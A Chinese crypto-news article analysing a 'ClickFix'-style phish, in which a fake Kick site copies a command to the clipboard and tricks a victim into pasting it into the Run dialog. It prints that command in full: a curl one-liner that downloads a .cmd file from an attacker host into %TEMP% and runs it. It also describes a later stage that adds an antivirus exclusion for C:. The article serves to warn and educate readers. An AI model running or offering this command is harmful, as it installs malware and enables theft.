币界网报道：又一朋友中了钓鱼木马，他是怎么中的钓鱼陷阱呢？
上午在几个群里看到一个聊天记录，讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。如上聊天记录所示，他当时是访问了一个假的kick网站，网址如下：https://kick.com.im/重要提醒：此为钓鱼网站，不要访问！！！此为钓鱼网站，不要访问！！！此为钓鱼网站，不要访问！！！
当我们访问此网站时，发现会出现一个是否是人类的验证，我们点击进行验证，会弹出以下提示：我们来解释上图是让你做什么操作：

按下Windows+R打开运行对话框Windows+R是windows系统下的一个快键命令，用来快速的打开运行对话框的。此处就是让你准备执行恶意脚本文件。
按下CTRL+V粘贴验证文本地球人都知道CTRL+V是用来粘贴的，在这一步大家是不是有个疑问，想CTRL+V之前得先CTRL+C进行复制呀，为什么没有复制直接就让粘贴了呢？我们看看钓鱼网站前端的代码：秘密就在这里，记得我们刚访问网站时让我们验证是否是人类，验证时得点鼠标，上面这段js代码就是检测鼠标的点击事件，当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中，这时候不用CTRL+C就能直接CTRL+V了。

那粘贴板中的恶意代码是什么呢？
cmd /c "curl -k -L -Sshttps://hcaptcha.ru/r-o "%TEMP%1.cmd" && "%TEMP%1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
上面的代码意思是从https://hcaptcha.ru/r（重要提醒：此为钓鱼网站，不要访问！！！此为钓鱼网站，不要访问！！！此为钓鱼网站，不要访问！！！）下载文件存到临时目录中，文件的名字叫“1.cmd”，然后执行此文件。打开下载后的文件发现是如下的代码：这段恶意代码首先会检查是否有管理员权限，当有管理员权限后会尝试将此脚本提升为管理员权限 。第二部分那一坨代码用Base64进行了编码，当解码后发现功能是将C:排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”，这样当木马在C盘执行时就不会被杀毒软件发现。第三部分代码gpt也没有解析出来，大致的用处就是从某一网站上下载木马到C盘，然后执行木马，这里就需要@evilcos老师等各位安全专家进行具体的分析。
针对上述钓鱼骗局我们可以得到如下的经验 ：

访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了kick直播的网址，kick的官方网址是https://kick.com/，如果受害者去google上搜索或者询问gpt也就不会上当。
执行每一步操作前都要慎重，要想明白这步操作的用处是什么，当我们不懂或者不清楚时，要善于用GPT 等AI 工具。

Web3处处是陷阱，希望大家都能避开各种坑。